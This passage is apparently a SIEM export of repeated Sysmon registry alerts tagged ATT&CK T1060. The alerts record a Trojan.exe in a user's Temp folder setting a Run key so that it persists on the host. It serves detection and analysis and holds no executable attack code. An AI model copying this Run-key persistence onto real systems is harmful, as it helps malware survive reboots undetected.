..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:46.712507300Z"",""eventRecordID"":""2025"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:46.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:46.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:49.143",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:45.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:45.676862000Z"",""eventRecordID"":""2024"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:45.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:45.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:48.008",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:44.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:44.633356400Z"",""eventRecordID"":""2023"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:44.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:44.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:46.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:43.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:43.577873700Z"",""eventRecordID"":""2021"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:43.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:43.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:45.935",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:42.558 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:42.561079100Z"",""eventRecordID"":""2018"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:42.558\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:42.558"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:44.931",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:41.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:41.544899900Z"",""eventRecordID"":""2017"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:41.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:41.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:43.901",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:40.511 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:40.513324400Z"",""eventRecordID"":""2016"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:40.511\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:40.511"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:42.869",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:39.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:39.496731100Z"",""eventRecordID"":""2015"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:39.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:39.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:41.994",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:38.481 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:38.482424300Z"",""eventRecordID"":""2014"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:38.481\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:38.481"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:41.978",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:37.465 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:37.472588400Z"",""eventRecordID"":""2013"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:37.465\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:37.465"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:41.901",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:36.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:36.460237600Z"",""eventRecordID"":""2012"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:36.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:36.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:38.823",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:35.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
